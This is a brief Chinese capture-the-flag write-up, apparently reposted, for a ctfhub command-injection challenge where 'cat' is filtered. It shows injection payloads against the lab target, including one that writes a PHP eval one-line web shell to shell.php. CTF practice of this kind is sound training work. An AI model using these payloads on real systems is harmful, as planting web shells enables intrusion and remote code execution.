ctfhub技能樹—RCE—過濾cat


打開靶機

查看頁面信息

構造payload

127.0.0.1 || ls

題目提示過濾了cat,但我還是想試試


果然不行

網頁訪問沒有結果,應該和上題一樣被注釋了,使用和同樣的方法進行解題

利用命令執行寫入一句話木馬

127.0.0.1 &echo "<?php @eval(\$_POST['a']);?>" >> shell.php




成功拿到flag


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM